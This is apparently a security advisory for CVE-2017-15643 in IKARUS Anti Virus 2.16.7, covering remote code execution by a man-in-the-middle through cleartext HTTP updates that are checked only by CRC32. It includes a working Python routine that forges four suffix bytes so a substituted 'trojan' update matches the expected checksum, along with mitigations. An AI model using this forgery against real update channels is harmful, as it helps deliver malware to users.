PT-2017-14135 · Ikarus · Ikarus Anti.Virus

Published

2017-10-19

·

Updated

2017-11-14

·

CVE-2017-15643

CVSS v2.0

7.6

High

Vector

AV:N/AC:H/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions

IKARUS Anti Virus version 2.16.7
Description

An active network attacker in a man-in-the-middle (MiTM) position can achieve remote code execution on a machine running the affected software. The client fetches updates over cleartext HTTP and verifies the downloaded files only with a CRC32 checksum and an update value. By modifying an HTTP response, the attacker can force the client to start an update transaction and serve a Trojan horse executable (for example a replacement guardxup.exe) whose CRC32 matches the value the client expects. CRC32 is an error-detection code, not a cryptographic integrity check: it is linear, so any file can be padded with four chosen bytes to produce an arbitrary checksum, and a correct CRC32 therefore says nothing about who produced the file.
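The following is an added example for this advisory, not Ikarus code and not part of the original entry. It shows why a CRC32 check cannot protect an update channel: given any replacement file, four trailing bytes are computed in closed form so that its CRC32 equals the checksum of the genuine update. The "genuine" and "trojan" update contents are constructed stand-ins, not real guardxup.exe data; the only real primitive is zlib.crc32 (the standard IEEE CRC-32). A pinned SHA-256 comparison is included beside it only to contrast the two; a real fix additionally needs TLS and a signed manifest.

```python
"""CRC32 forgery: make a substituted update match the checksum the client expects.

Added example for this advisory, not Ikarus code. GENUINE_UPDATE and
TROJAN_UPDATE are constructed stand-ins for update files.
"""
import hashlib
import hmac
import zlib

POLY = 0xEDB88320  # reflected IEEE CRC-32 polynomial, the one zlib.crc32 uses


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# Every table entry has a distinct top byte; that is what lets the last four
# register updates be inverted one byte at a time instead of by search.
TOP_BYTE_TO_INDEX = {t >> 24: i for i, t in enumerate(TABLE)}
assert len(TOP_BYTE_TO_INDEX) == 256


def forge_suffix(data: bytes, target_crc: int) -> bytes:
    """Return 4 bytes s such that zlib.crc32(data + s) == target_crc."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF   # CRC register after processing data
    want = target_crc ^ 0xFFFFFFFF        # register value that yields target_crc
    # Walk the final four byte-steps backwards. At each step the top byte of
    # the register is the top byte of the table entry used, which fixes the
    # table index; the unknown low byte shifts out before it is ever needed.
    indexes = [0] * 4
    val = want
    for k in range(3, -1, -1):
        indexes[k] = TOP_BYTE_TO_INDEX[val >> 24]
        val = ((val ^ TABLE[indexes[k]]) << 8) & 0xFFFFFFFF
    # Replay forwards: once the register is known, each index fixes the byte.
    suffix = bytearray()
    for idx in indexes:
        b = (reg ^ idx) & 0xFF
        suffix.append(b)
        reg = TABLE[(reg ^ b) & 0xFF] ^ (reg >> 8)
    return bytes(suffix)


def crc32_check(payload: bytes, expected_crc: int) -> bool:
    """The kind of check the description says the client performs."""
    return zlib.crc32(payload) == expected_crc


def sha256_check(payload: bytes, expected_hex: str) -> bool:
    """Pinned SHA-256 comparison in constant time. On its own this only shows
    that a collision-resistant hash is not forgeable this way; the digest
    must still be signed and fetched over TLS to protect against MiTM."""
    return hmac.compare_digest(hashlib.sha256(payload).hexdigest(), expected_hex)


# Constructed stand-ins; neither is a real update file.
GENUINE_UPDATE = b"MZ" + b"\x00" * 62 + b"genuine update payload v2.16.7"
TROJAN_UPDATE = b"MZ" + b"\x00" * 62 + b"attacker controlled payload"


def demo() -> dict:
    published_crc = zlib.crc32(GENUINE_UPDATE)
    published_sha = hashlib.sha256(GENUINE_UPDATE).hexdigest()
    forged = TROJAN_UPDATE + forge_suffix(TROJAN_UPDATE, published_crc)
    return {
        "published_crc": published_crc,
        "forged_crc": zlib.crc32(forged),
        "crc_accepts_trojan": crc32_check(forged, published_crc),
        "sha256_accepts_trojan": sha256_check(forged, published_sha),
    }


if __name__ == "__main__":
    r = demo()
    print(f"published CRC32 {r['published_crc']:08x}, forged file CRC32 {r['forged_crc']:08x}")
    print("CRC32 check accepts trojan:  ", r["crc_accepts_trojan"])
    print("SHA-256 check accepts trojan:", r["sha256_accepts_trojan"])
```

Appending four bytes to a Windows executable does not affect how it runs, since the loader ignores data past the end of the PE image (installers routinely carry such overlay data), so the attacker's binary stays functional while matching the expected checksum.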
Recommendations

For IKARUS Anti Virus version 2.16.7, disable the cleartext HTTP update path, or block the endpoint's outbound HTTP to the update host at the network edge, until a secure update mechanism (TLS plus signature verification of the downloaded files) is implemented or a patch is available. Restrict which users and network paths can trigger the update module, since any party that can alter HTTP responses on the route to the update server can exploit the issue. Avoid using the affected update mechanism until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

Exploit

HTTP Request/Response Smuggling


Weakness Enumeration

Related Identifiers

CVE-2017-15643

Affected Products

Ikarus Anti.Virus